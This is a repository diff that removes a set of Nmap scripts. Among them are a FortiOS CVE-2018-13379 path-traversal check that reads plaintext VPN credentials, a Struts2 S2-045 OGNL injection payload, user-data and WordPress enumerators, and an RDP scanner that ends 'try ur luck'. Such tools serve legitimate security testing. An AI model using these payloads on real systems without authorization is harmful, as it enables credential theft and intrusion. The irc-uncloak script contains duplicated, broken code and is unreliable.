-- <elem key="1:equipmentFamily">Generic </elem>
-- <elem key="1:roleDocument">BOILER_ROOMS </elem>
-- <elem key="1:isOffline">false </elem>
-- <elem key="2:equipmentUri">/equipment/generic/generic/## </elem>
-- <elem key="2:displayName">BOILER ROOMS </elem>
-- <elem key="2:deviceName">BOILER ROOMS </elem>
-- <elem key="2:equipmentFamily">Generic </elem>
-- <elem key="2:roleDocument">BOILER_ROOMS </elem>
-- <elem key="2:isOffline">false </elem>
-- <elem key="3:equipmentUri">/equipment/generic/generic/## </elem>
-- <elem key="3:displayName">EXHAUSTS 3 RM-6 </elem>
-- <elem key="3:deviceName">EXHAUSTS 3 RM-6 </elem>
-- <elem key="3:equipmentFamily">Generic </elem>
-- <elem key="3:roleDocument">EXHAUSTS_3_RM-6 </elem>
-- <elem key="3:isOffline">false </elem>
---
author = "Pedro Joaquin <pjoaquin()websec.mx>"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln", "safe"}
portrule = shortport.portnumber({80})
local output = stdnse.output_table()
local outputcol = "\nuserId, firstName, lastName, phoneNo, email, administrator, active,\n"
local count = 1
local function GetUserInfo(host, port, usernumber)
--Get information from /evox/user/user/#usernumber#
local uri = '/evox/user/user/'..usernumber
local response = http.get(host, port, uri)
if response['status-line'] and response['status-line']:match("200") then
--Verify response and parsing of XML /evox/user/user/#usernumber#
local xmlparsetest = response['body']:match('userId')
if not xmlparsetest then
stdnse.debug1("Problem with XML parsing. No users found in /evox/user/user")
return nil, "Problem with XML parsing. No users found in /evox/user/user"
end
if response['status-line'] and response['status-line']:match("401") then
stdnse.debug1("401 Unauthorized")
return nil, "401 Unauthorized"
end
local keylist = {"userId","firstName","lastName","phoneNo","email", "administrator","active"}
for _,key in ipairs(keylist) do
stdnse.debug1("Looking for : "..key)
output[count..":"..key] = response['body']:match(key..'" val=([^<]*) />')
output[count..":"..key] = string.gsub(output[count..":"..key],'"',"")
outputcol = outputcol..output[count..":"..key]..', '
stdnse.debug1("Found : "..output[count..":"..key])
end
count = count + 1
outputcol = outputcol .. '\n'
end
end
local function GetInformation(host, port)
--Get information from /evox/user/user
local uri = '/evox/user/user'
local response = http.get(host, port, uri)
if response['status-line'] and response['status-line']:match("200") then
--Verify response and parsing of XML from /evox/user/user
local xmlparsetest = response['body']:match('<ref href="([^<]*)/" is="trane:SC/user/user')
if not xmlparsetest then
stdnse.debug1("Problem with XML parsing. No users found in /evox/user/user")
return nil, "Problem with XML parsing. No users found in /evox/user/user"
end
if response['status-line'] and response['status-line']:match("401") then
stdnse.debug1("401 Unauthorized")
return nil, "401 Unauthorized"
end
--Parse information from /evox/user/user to get usernumbers
local _,lastuser = response['body']:find(".*trane:SC/user/user_")
stdnse.debug1("lastuser : "..lastuser)
local count = 0
local nextuser = 1
while nextuser < lastuser do
stdnse.debug1("lastuser : "..lastuser)
output["usernumber"] = response['body']:match('<ref href="([^<]*)/" is="trane:SC/user/user',nextuser)
if output["usernumber"] == nil then
output["usernumber"] = "Not available"
else
stdnse.debug1("Found : "..output["usernumber"])
GetUserInfo(host, port, output["usernumber"])
end
_,nextuser = response['body']:find("trane:SC/user/user_",nextuser)
stdnse.debug1("nextuser : "..nextuser)
count = count + 1
stdnse.debug1("Count : "..count)
end
end
return outputcol
end
action = function(host,port)
-- Identify servers that answer 200 to invalid HTTP requests and exit as these would invalidate the tests
local status_404, result_404, _ = http.identify_404(host,port)
if ( status_404 and result_404 == 200 ) then
stdnse.debug1("Exiting due to ambiguous response from web server on %s:%s. All URIs return status 200.", host.ip, port.number)
return nil
end
return GetInformation(host, port)
end

129
nmap_scripts/http-vuln-cve2018-13379.nse
View File

@ -1,129 +0,0 @@
local http = require "http"
local shortport = require "shortport"
local vulns = require "vulns"
local stdnse = require "stdnse"
local string = require "string"
local table = require "table"
local nsedebug = require('nsedebug')
description = [[
Attempts to detect a path traversal vulnerability in the FortiOS SSL VPN web portal that may allow
an unauthenticated attacker to download FortiOS system files.
FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests. This script
will try to read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text).
This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
Vulnerability discovered by Orange Tsai (@orange_8361) and Meh Chang (@mehqq_).
]]
---
-- @usage nmap -p 10443 --script http-vuln-cve2018-13379 <host>
--
-- @output
-- PORT STATE SERVICE REASON
-- 10443/tcp open ssl/http Fortinet SSL VPN
-- | CVE-2018-13379:
-- | VULNERABLE:
-- | FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure
-- | State: VULNERABLE (Exploitable)
-- | IDs: CVE-2018-13379
-- | Description:
-- | Attempts to detect a path traversal vulnerability in the FortiOS SSL VPN web portal that may allow
-- | an unauthenticated attacker to download FortiOS system files.
-- |
-- | FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests. This script
-- | will try to read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text).
-- | This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
-- |
-- | Vulnerability discovered by Orange Tsai (@orange_8361) and Meh Chang (@mehqq_).
-- | Disclosure date: 24-05-2019
-- | References:
-- | https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf
-- |_ https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html
--
-- @xmloutput
-- <table key="CVE-2018-13379">
-- <elem key="title">FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure</elem>
-- <elem key="state">VULNERABLE</elem>
-- <table key="description">
-- <elem> FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests.&#xa; This script will try to read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text).&#xa; This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).&#xa;&#xa; Vulnerability discovered by Orange Tsai (@orange_8361) and Meh Chang (@mehqq_).&#xa; </elem>
-- </table>
-- <table key="dates">
-- <table key="disclosure">
-- <elem key="month">05</elem>
-- <elem key="day">24</elem>
-- <elem key="year">2019</elem>
-- </table>
-- </table>
-- <elem key="disclosure">2019-05-24</elem>
-- <table key="refs">
-- <elem>https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html</elem>
-- <elem>https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf</elem>
-- </table>
-- </table>
---
author = {"Asahel Hernandez (Blazz3) <theblazz3@gmail.com>"}
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"vuln","safe"}
portrule = shortport.http
action = function(host, port)
local vuln = {
title = 'FortiOS 5.6.3 - 5.6.7 / FortiOS 6.0.0 - 6.0.4 - Credentials Disclosure',
state = vulns.STATE.NOT_VULN, -- default
description = [[
Attempts to detect a path traversal vulnerability in the FortiOS SSL VPN web portal that may allow
an unauthenticated attacker to download FortiOS system files.
FortiOS system file leak through SSL VPN via specially crafted HTTP resource requests. This script
will try to read /dev/cmdb/sslvpn_websession file, this file contains login and passwords in (clear/text).
This vulnerability affect ( FortiOS 5.6.3 to 5.6.7 and FortiOS 6.0.0 to 6.0.4 ).
Vulnerability discovered by Orange Tsai (@orange_8361) and Meh Chang (@mehqq_).
]],
IDS = {CVE = 'CVE-2018-13379'},
references = {
'https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf',
'https://blog.orange.tw/2019/08/attacking-ssl-vpn-part-2-breaking-the-fortigate-ssl-vpn.html'
},
dates = {
disclosure = {year = '2019', month = '05', day = '24'},
},
}
local report = vulns.Report:new(SCRIPT_NAME, host, port)
local path = "/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"
local response = http.get(host, port, tostring(path))
local body = response.body
--local fbody = body:gsub("%z", ".")
--stdnse.debug1("Body: %s", fbody)
if response.status == 200 and http.response_contains(response, "var fgt_lang =") then
stdnse.debug1("Vulnerable!")
vuln.state = vulns.STATE.VULN
local extra_info = body:gsub("[^\x20-\x7E]", ".")
local extra_info2 = extra_info:gsub("%.+", "\n")
local f = ""
local t = {}
for i in extra_info2:gmatch("%w+") do
t[#t + 1] = i
end
for k,v in ipairs(t) do
if string.len(v) > 5 then
if not (string.match(v, "Soprema") and string.match(v, "WebSSLSoprema")) then
f = f..v.."\n"
end
end
end
vuln.extra_info = "Snippet from configuration file:\n"..f
else
vuln.state = vulns.STATE.NOT_VULN
stdnse.debug1("Not Vulnerable...")
end
return report:make_output(vuln)
end

141
nmap_scripts/http-wordpress-attachment.nse
View File

@ -1,141 +0,0 @@
local http = require "http"
local io = require "io"
local nmap = require "nmap"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
description = [[
Enumerates URLs of uploaded media and pages in Wordpress blog/CMS installations by exploiting an information disclosure vulnerability.
$ git clone https://github.com/hkm/nmap-nse-scripts.git
Original advisory:
* http://blog.whitehatsec.com/information-leakage-in-wordpress/#.Ueig9m0_yms
]]
---
-- @usage
-- nmap -p80 --script http-wordpress-attachment <target>
-- nmap -sV --script http-wordpress-attachment --script-args limit=1000 <target>
--
-- @output
-- PORT STATE SERVICE
-- 80/tcp open http
-- | http-wordpress-attachment:
-- | URL: http://www.hakim.ws/calendario/
-- | URL: http://www.hakim.ws/2010/12/noticias-anteriores-al-201/
-- |_Search stopped at ID #25. Increase the upper limit if necessary with '--script-args limit=1000'
--
-- @args http-wordpress-attachment.limit Upper limit for ID search. Default: 100
-- @args http-wordpress-attachment.basepath Base path to Wordpress. Default: /
-- @args http-wordpress-attachment.out If set it saves the URL list in this file.
---
author = "Pedro Joaquin based on Paulino Calderon http-wordpress-enum"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"auth", "intrusive", "vuln"}
portrule = shortport.http
---
-- Returns the URL extracted from the Location corresponding to the attachment_id passed
-- If attachment_id doesn't exists returns false
-- @param host Host table
-- @param port Port table
-- @param path Base path to WP
-- @param id Attachment id
-- @return false if not found otherwise it returns the username
---
local function get_wp_url(host, port, path, id)
stdnse.print_debug(2, "%s: Trying to get URL with attachment_id %s", SCRIPT_NAME, id)
local req = http.get(host, port, path.."?attachment_id="..id, {no_cache = true, redirect_ok = false})
if req.status == 301 then
if string.find(req.header.location, "attachment_id") == nil then
stdnse.print_debug(1, "Attachment_id #%s returned %s", id, req.header.location)
return req.header.location
end
end
return false
end
---
--Returns true if WP installation exists.
--We assume an installation exists if wp-content is found in body of index.php
--@param host Host table
--@param port Port table
--@param path Path to WP
--@return True if 404 page contains string wp-content
--
local function check_wp(host, port, path)
stdnse.print_debug(2, "Checking wp-content in body")
local req = http.get(host, port, path..math.random(1, 99999999), {no_cache = true})
if req.status == 404 then
if string.find(tostring(req.body), "wp%-content") ~= nil then
stdnse.print_debug(1, "Wordpress installation detected. String wp-content found in 404 body")
return true
end
end
return false
end
---
--Writes string to file
--Taken from: hostmap.nse
--@param filename Target filename
--@param contents String to save
--@return true when successful
local function write_file(filename, contents)
local f, err = io.open(filename, "w")
if not f then
return f, err
end
f:write(contents)
f:close()
return true
end
---
--MAIN
---
action = function(host, port)
local basepath = stdnse.get_script_args("http-wordpress-attachment.basepath") or "/"
local limit = stdnse.get_script_args("http-wordpress-attachment.limit") or 100
local filewrite = stdnse.get_script_args("http-wordpress-attachment.out")
local output = {""}
local users = {}
--First, we check this is WP
if not(check_wp(host, port, basepath)) then
if nmap.verbosity() >= 2 then
return "[Error] Wordpress installation was not found. We couldn't find wp-content"
else
return
end
end
--Incrementing ids to enum URLs
for i=1, tonumber(limit) do
local user = get_wp_url(host, port, basepath, i)
if user then
output[#output+1] = string.format("URL: %s", user)
users[#users+1] = user
end
end
if filewrite and #users>0 then
local status, err = write_file(filewrite, stdnse.strjoin("\n", users))
if status then
output[#output+1] = string.format("URLs saved to %s\n", filewrite)
else
output[#output+1] = string.format("Error saving %s: %s\n", filewrite, err)
end
end
if #output > 1 then
output[#output+1] = string.format("Search stopped at ID #%s. Increase the upper limit if necessary with 'http-wordpress-attachment.limit'", limit)
return stdnse.strjoin("\n", output)
end
end

115
nmap_scripts/httpframe.nse
View File

@ -1,115 +0,0 @@
local http = require "http"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
description = [[
Stores the results of an HTTP(S) scan on a HTML page with JQuery. Shows IP, header,
realm and tries to identify if target is a router, camera or common web server.
Almacena los resultados de un barrido HTTP(S) en una página web con Frames y JQuery.
Muestra las direcciones IP, un mirror del contenido html, el contenido de la cabecera
www-authenticate. De acuerdo al header server o al contenido de la página que obtiene
muestra si es un router, cámara o firewall.
$ git clone https://github.com/hkm/nmap-nse-scripts.git
]]
author = {'Pedro Joaquin pjoaquin()websec.mx'}
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"discovery"}
portrule = shortport.port_or_service({80, 443},
{"http", "https"})
local function categoria(server)
local modemlist = {'Router', 'Modem','RomPager', 'DSL', 'Mbedthis','Mathopd','GoAhead','IOS','httpd','siyou server','lighttpd','login.lp','ADTRAN','Technicolor','url_filter_hint.asp','RouterOS'}
for i=1, #modemlist do
if string.find(server, modemlist[i]) then return "Router" end
end
local camlist = {'dcs-lig-httpd', 'Camera', 'Avtech', 'Hikvision', 'iCanWebServer', 'Boa', 'AV-TECH','Cross Web Server','DCS-','netcam'}
for i=1, #camlist do
if string.find(server, camlist[i]) then return "Camera" end
end
local serverlist = {'Apache', 'IIS'}
for i=1, #serverlist do
if string.find(server, serverlist[i]) then return "Server" end
end
return "Unknown"
end
local function siexiste(var1)
if var1 == nil then
return ""
else
return var1
end
end
local function savefile(name, content, mode)
local file, err = io.open(name, mode)
if ( file ) then
file:write(content)
file:close()
else
return "\n ERROR: " .. file
end
end
savefile('httpframe_log.html', '<HTML><TITLE>httpframe.nse v0.5</TITLE><FRAMESET rows="390,*"><frame src="httpframe_log/menu.htm"><frame name="main" src="about:blank"></FRAMESET></HTML>', 'w')
savefile("httpframe_log/menu.htm", '<html><head><link href="../httpframe_files/advancedtable.css" rel="stylesheet" type="text/css" /><script src="../httpframe_files/jquery.js" type="text/javascript" language="javascript"></script><script src="../httpframe_files/advancedtable.js" type="text/javascript" language="javascript"></script><script language="javascript" type="text/javascript">'..
'$().ready(function() {'..
'$("#searchtable").show();'..
'$("#table1").advancedtable({rowsPerPage: 10000, searchField: "#search", loadElement: "#loader", searchCaseSensitive: false, ascImage: "../httpframe_files/images/up.png", descImage: "../httpframe_files/images/down.png",sortColumnDefault: 1, navigationLabel: "Paginas "});'..
'});'..
'</script></head><body>','w')
savefile("httpframe_log/menu.htm", '<table width="100%" class="normal" id="searchtable" border="0" cellspacing="4" cellpadding="0" style="display:none;"><tr>'..
'<td width="50%">Filter: <input name="search" type="text" id="search" style="display:none;" /></td>'..
'<td width="33%"><div id="loader" style="display:none;"><img src="httpframe_files/images/loader.gif" alt="Loading..." /></div></td>'..
'<td width="34%"><div style="float:right;padding:0"><a href=http://websec.mx><img src="../httpframe_files/images/logo.jpg" border=0></a></div></td>'..
'</tr></table>', 'a+')
savefile("httpframe_log/menu.htm", '<table id="table1" class="advancedtable" width="100%"><thead><th>IP</th><th>mirror</th><th>status</th><th>size</th><th>device</th><th>server</th><th>www-authenticate header</th><tbody>','a+')
action = function(host, port)
local query = http.get(host.ip, port, "/")
local serverstring = " "
if query.header['server'] ~= nil then serverstring = query.header['server'] end
if query.header['www-authenticate'] ~= nil then serverstring = serverstring .. query.header['www-authenticate'] end
if query.body ~= nil then savefile("httpframe_log/" .. host.ip .. ".html", query.body, 'w') end
if query.status == 302 then
serverstring = serverstring .. query.header['location']
savefile("httpframe_log/" .. host.ip .. ".html", "Location: "..query.header['location'], 'w')
end
if query.body ~= nil then
if string.find(query.body, ".location") then
serverstring=serverstring..query.body
query.body="<textarea cols=100 rows=40>"..query.body.."</textarea>"
savefile("httpframe_log/" .. host.ip .. ".html", query.body, 'w')
end
end
if port.service == "https" then
savefile("httpframe_log/menu.htm", '<tr class="'.. categoria(serverstring) ..'"><td width="10"><a href="'.. port.service ..'://' .. host.ip ..':' .. port.number ..'" target="main">'.. port.service ..'://' .. host.ip ..':' .. port.number ..'</a></td>', 'a+')
else
savefile("httpframe_log/menu.htm", '<tr class="'.. categoria(serverstring) ..'"><td width="10"><a href="http://' .. host.ip ..':' .. port.number ..'" target="main">http://' .. host.ip ..':' .. port.number ..'</a></td>', 'a+')
end
savefile("httpframe_log/menu.htm", '<td width="100"><a href="'.. host.ip .. '.html" target="main">[mirror]</a></td>', 'a+')
savefile("httpframe_log/menu.htm", '<td width="100">['.. siexiste(query.status) ..']&nbsp;</td>', 'a+')
savefile("httpframe_log/menu.htm", '<td width="100">'.. string.len(siexiste(query.body)) ..' B</td>', 'a+')
savefile("httpframe_log/menu.htm", '<td width="120">'.. siexiste(categoria(serverstring)) ..' &nbsp;</td>', 'a+')
savefile("httpframe_log/menu.htm", '<td width="220">'.. siexiste(query.header['server']) ..' &nbsp;</td>', 'a+')
savefile("httpframe_log/menu.htm", '<td>'.. siexiste(query.header['www-authenticate']) ..' &nbsp;</td>', 'a+')
return "Information added to httpframe_log.html "
end

1225
nmap_scripts/infiltrator.nse
View File

File diff suppressed because it is too large Load Diff

172
nmap_scripts/irc-uncloak.nse
View File

@ -1,172 +0,0 @@
local comm = require "comm"
local math = require "math"
local nmap = require "nmap"
local pcre = require "pcre"
local shortport = require "shortport"
local stdnse = require "stdnse"
local string = require "string"
-- Check http://irc.netsplit.de for IRC networks to scan..
description = [[
Detects if an IRC (Internet Relay Chat) network's services are affected by an IP address uncloaking weakness: http://decal.sdf.org/spotfedsonline
$ git clone https://github.com/decal/irc-uncloak-nse.git
$ cd /irc-uncloak-nse
$ sudo cp * /usr/share/nmap/scripts/
$ sudo nmap -p 6667 --script irc-uncloak.nse victim_host
]]
---
-- @output
-- 6667/tcp open irc
-- | irc-uncloak:
-- | svcserv: services.
-- | svcname: atheme 7.0.6. services. 03cfd743661f07975fa2f1220c5194cbaff4845
-- |_ svcweak: IRC services appear to be vulnerable to IP address uncloaking weakness
--@xmloutput
-- <elem key="svcserv">services.</elem>
-- <elem key="svcname">atheme 7.0.6. services. 03cfd743661f07975fa2f1220c5194cbaff4845</elem>
-- <elem key="svcweak">IRC services appear to be vulnerable to IP address uncloaking weakness</elem>
--
author = "Derek Callaway"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
categories = {"default", "discovery", "safe"}
portrule = shortport.port_or_service({6666,6667,6697,6679},{"irc","ircs"})
local init = function()
-- Server part of WHOIS response
nmap.registry.ircserverinfo_312 = nmap.registry.ircserverinfo_312
or pcre.new("^:([\\w-_.]+) 312", 0, "C")
nmap.registry.ircserverinfo_375 = nmap.registry.ircserverinfo_375
or pcre.new("^:([\\w-_.]+) 375", 0, "C")
nmap.registry.ircserverinfo_422 = nmap.registry.ircserverinfo_422
or pcre.new("^:([\\w-_.]+) 422", 0, "C")
nmap.registry.ircserverinfo_433 = nmap.registry.ircserverinfo_433
or pcre.new("^:[\\w-_.]+ 433", 0, "C")
nmap.registry.ircserverinfo_ping = nmap.registry.ircserverinfo_ping
or pcre.new("^PING :(.+)", 0, "C")
nmap.registry.ircserverinfo_351 = nmap.registry.ircserverinfo_351
or pcre.new("^:[\\w-_.]+ 351 \\w+ ([^:]+)", 0, "C")
nmap.registry.ircserverinfo_error = nmap.registry.ircserverinfo_error
or pcre.new("^ERROR :(.*)", 0, "C")
end
action = function(host, port)
local sd = nmap.new_socket()
local curr_nick = random_nick()
local ssvcserv, ssvcname, ssvcweak, serr
local s, e, t
local buf
local banner_timeout = 60
local make_output = function()
local o = stdnse.output_table()
-- Latest versions of anope and atheme are vulnerable
if string.match(ssvcname:lower(), "anope") or string.match(ssvcname:lower(), "atheme") then
o["svcserv"] = ssvcserv
o["svcname"] = ssvcname
o["svcweak"] = "IRC services appear to be vulnerable to IP address uncloaking weakness"
end
return o
end
init()
local sd, line = comm.tryssl(host, port, "USER nmap +iw nmap :Nmap Wuz Here\nNICK " .. curr_nick .. "\n")
if not sd then return "Unable to open connection" end
sd:set_timeout(banner_timeout * 1000)
buf = stdnse.make_buffer(sd, "\r?\n")
while true do
if (not line) then break end
s, e, t = nmap.registry.ircserverinfo_375:exec(line, 0, 0)
if (s) then
sd:send("WHOIS ChanServ ChanServ\n")
end
s, e, t = nmap.registry.ircserverinfo_422:exec(line, 0, 0)
if (s) then
sd:send("WHOIS ChanServ ChanServ\n")
end
s, e, t = nmap.registry.ircserverinfo_433:exec(line, 0, 0)
if (s) then
curr_nick = random_nick()
sd:send("NICK " .. curr_nick .. "\n")
end
s, e, t = nmap.registry.ircserverinfo_ping:exec(line, 0, 0)
if (s) then
sd:send("PONG :" .. string.sub(line, t[1], t[2]) .. "\n")
end
s, e, t = nmap.registry.ircserverinfo_312:exec(line, 0, 0)
if (s) then
ssvcserv = string.sub(line, t[1], t[2])
sd:send("VERSION " .. ssvcserv .. "\n")
end
s, e, t = nmap.registry.ircserverinfo_351:exec(line, 0, 0)
if (s) then
ssvcname = string.sub(line, t[1], t[2])
return make_output()
end
s, e, t = nmap.registry.ircserverinfo_error:exec(line, 0, 0)
if (s) then
serr = string.sub(line, t[1], t[2])
return make_output()
end
line = buf()
end
end
s, e, t = nmap.registry.ircserverinfo_312:exec(line, 0, 0)
if (s) then
ssvcserv = string.sub(line, t[1], t[2])
sd:send("VERSION " .. ssvcserv .. "\n")
end
s, e, t = nmap.registry.ircserverinfo_351:exec(line, 0, 0)
if (s) then
ssvcname = string.sub(line, t[1], t[2])
return make_output()
end
s, e, t = nmap.registry.ircserverinfo_error:exec(line, 0, 0)
if (s) then
serr = string.sub(line, t[1], t[2])
return make_output()
end
line = buf()
end
end
random_nick = function()
local nick = ""
for i = 0, 8, 1 do
nick = nick .. string.char(math.random(97, 122))
end
return nick
end

81
nmap_scripts/manager.py
View File

@ -1,81 +0,0 @@
"""
Basic script to download and manage Nmap's official .nse scripts.
**Features:**
1. Download and update existing .nse scripts from Github.
2. Get basic usage info for any downloaded script.
"""
import re
import sys
import os
import requests
from datetime import datetime
import argparse
__scriptFolder = "nseScripts"
def updateDB():
extractionRe = re.compile(r'href="(\/nmap\/nmap\/blob\/master\/scripts\/.*?)".*?datetime="(.*?)Z', re.DOTALL)
nameRe = re.compile(r'scripts/(.*)')
gitPage = requests.get("https://github.com/nmap/nmap/tree/master/scripts")
reRes = re.findall(extractionRe, gitPage.content.decode("utf-8"))
fileDir = os.path.dirname(os.path.abspath(__file__))
if not os.path.isdir(__scriptFolder):
os.mkdir(os.path.join(fileDir, __scriptFolder))
fileDir = os.path.join(fileDir, __scriptFolder)
try:
for (httpDir, date) in reRes:
scriptName = re.search(nameRe, httpDir).group(1)
fileName = os.path.join(fileDir, scriptName)
url = "https://raw.githubusercontent.com" + httpDir.replace(r"/blob", "")
date = int(datetime.fromisoformat(date).timestamp())
if os.path.isfile(fileName):
if int(os.path.getmtime(fileName)) == date:
print(f"Skipping {scriptName}, unchanged")
continue
else:
print(f"Updating {scriptName}")
else:
print(f"Downloading {scriptName}")
subPage = requests.get(url)
with open(fileName, 'w') as f:
f.write(subPage.content.decode('utf-8'))
os.utime(fileName, (datetime.now().timestamp(), date))
except KeyboardInterrupt:
print("\nExitting..")
except:
print("An error occured")
return False
return True
def helper(fileName):
fileName = os.path.basename(fileName)
fileName = fileName.replace(".nse", "")
url = "https://nmap.org/nsedoc/scripts/" + fileName + ".html"
page = requests.get(url)
if "Error 404" in page.text:
print("Page does not exist. Make sure file name is correct")
return False
summaryRe = re.compile(r"User Summary.*?p>\n?(.*?)<\/p>", re.DOTALL)
summary = re.search(summaryRe, page.content.decode('utf-8')).group(1)
summary = re.sub(r"<.*?>", "", summary)
print(summary)
print(f"For more info visit {url}\n")
if __name__ == "__main__":
parser = argparse.ArgumentParser(
allow_abbrev=False, description="Nmap .nse script manager")
parser.add_argument('--update', action='store_true',
help="Update nse script database")
parser.add_argument('--info', action='store',
type=str, metavar="file.nse",
help="Basic summary of script in database")
args = parser.parse_args()
if len(sys.argv) == 1:
print("At least one arguement is required, pass with -h for some help")
quit()
if args.update:
updateDB()
if args.info:
helper(args.info)

76
nmap_scripts/philipshue-info.nse
View File

@ -1,76 +0,0 @@
local nmap = require "nmap"
local http = require "http"
local stdnse = require "stdnse"
local string = require "string"
local shortport = require "shortport"
local json = require "json"
description = [[
The Philips Hue is a wireless lighting system. This script obtains
information from the web API of the Philips Hue Bridge.
Tested on Philips Hue Bridge apiversion: 1.19.0 on 6/25/17.
References:
* http://websec.mx
* https://developers.meethue.com/philips-hue-api
]]
---
-- @usage nmap -p80 --script philipshue-info.nse <target>
--
-- @output
-- | phillipshue-info:
-- | bridgeid: 001788FFFE2F3F58
-- | swversion: 1705121051
-- | replacesbridgeid:
-- |
-- | datastoreversion: 61
-- | factorynew: false
-- | starterkitid:
-- | apiversion: 1.19.0
-- | modelid: BSB002
-- | mac: 00:17:88:2f:3f:58
-- |_ name: Philips hue
--
-- @xmloutput
-- <elem key="bridgeid">001788FFFE2F3F58</elem>
-- <elem key="swversion">1705121051</elem>
-- <elem key="datastoreversion">61</elem>
-- <elem key="factorynew">false</elem>
-- <elem key="starterkitid"></elem>
-- <elem key="apiversion">1.19.0</elem>
-- <elem key="modelid">BSB002</elem>
-- <elem key="mac">00:17:88:2f:3f:58</elem>
-- <elem key="name">Philips hue</elem>
---
author = "Pedro Joaquin <pjoaquin()websec.mx>"
license = "Same as Nmap--See https://nmap.org/book/man-legal.html"
categories = {"discover", "version", "safe"}
portrule = shortport.portnumber(80)
local URI = '/api/config'
local function GetInformation(host, port)
local response = http.get(host, port, URI)
if response.body and response['body']:match("bridgeid") then
local stat, output = json.parse(response.body)
if stat then
return output
else
errmsg = "Error parsing JSON from "..URI.." response: "..output
end
else
errmsg = "No response or 'bridgeid' not found in response"
end
stdnse.debug1(errmsg)
return nil, errmsg
end
action = function(host,port)
return GetInformation(host, port)
end

69
nmap_scripts/rdpScan.nse
View File

@ -1,69 +0,0 @@
#!/bin/bash
#
# rdpScan - scan a network segment for RDP-Server
# author: silverstoneblue@gmx.net
# requires: fgrep awk nmap
scriptname="rdpScan"
version="1.0"
rdpips="/tmp/tmprdp.$$"
declare -i rdpfound=0
function is_installed {
which $1 > /dev/null 2>&1
if [ $? -ne 0 ]
then
printf "\nERROR: %s not installed.\n\n" $1
exit 255
fi
}
is_installed fgrep
is_installed awk
is_installed nmap
if [ $# -ne 1 ]; then
printf "\n \n"
printf "rdpScan - scan a network segment for RDP-Server \n\n"
printf "version %s by silverstoneblue@gmx.net \n\n" $version
printf "Usage: %s {target network}\n\n" $scriptname
printf "target network:\n"
printf " can pass hostnames, IP's, networks, etc.\n"
printf " server.company.com, company.com/24, 192.168.0.1/16, 10.0.0-255.1-254\n"
printf "example:\n"
printf " %s 80.187.0.0/24\n\n" $scriptname
exit 255
fi
iprange=$1
printf "\nScanning for RDP-Server..."
nmap -n -P0 -sS -p 3389 -oG - $iprange | fgrep 'Ports: 3389/open/tcp//ms-term-serv///' | awk '{print $2}' > $rdpips
printf "\n\n"
exec 3< $rdpips
echo "*****************"
echo "RDP IP Address"
echo "*****************"
while read rdpip <&3 ; do
rdpfound=$rdpfound+1
printf "%-15s %s\n" $rdpip
done
if [ $rdpfound -eq 0 ] ; then
printf "No RDP-Server found on network target %s. \n\n" $iprange
rm -f $rdpips
exit 255
fi
printf "\n%d RDP-Server found on network target %s.\n" $rdpfound $iprange
printf "Now try ur luck ;)\n"
printf "have fun ;) \n"
rm -f $rdpips
exit 0

119
nmap_scripts/struts2-scan.nse
View File

@ -1,119 +0,0 @@
description = [[
Struts2 S2-045 Nmap Scan Script
# Struts2 S2-045 Vulnerabilities info
[CNNVD-2017-03-07](http://cnnvd.org.cn/notice/show/id/8230)
[CNTA-2017-0016](http://www.cnvd.org.cn/webinfo/show/4080)
[US-CERT](https://www.us-cert.gov/ncas/current-activity/2017/03/08/Apache-Software-Foundation-Releases-Security-Updates)
# Usage script
1、copy struts2-scan.nse to nmap script folder
2、run `nmap -script struts2-scan -sS -p 80,8080,81,82,83,84,85,86,87,88,8888,8088 -n -d ip -oX outscan.xml`
# Risk Awareness Report
[Struts2 S2-045 Risk Awareness Report](http://plcscan.org/blog/2017/03/struts2-s2-045-risk-awareness-report-from-beaconla
]]
---
-- nmap -script struts2-scan -sS -p 80,8080,81,82,83,84,85,86,87,88,8888,8088 -n -d ip -oX outscan.xml
--
-- BeaconLab http://plcscan.org/blog/
---
categories = {"discovery", "safe"}
author = "Z-0ne"
license = "Same as Nmap--See http://nmap.org/book/man-legal.html"
local http = require "http"
local target = require "target"
local shortport = require "shortport"
local stdnse = require "stdnse"
local table = require "table"
--use script to scan any open TCP port
portrule = function(host, port)
return port.state == "open"
end
action = function(host, port)
local output = stdnse.output_table()
local options
local payload = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#o=@org.apache.struts2.ServletActionContext@getResponse().getWriter()).(#o.println('Struts2S2045Checks!!!')).(#o.close())}"
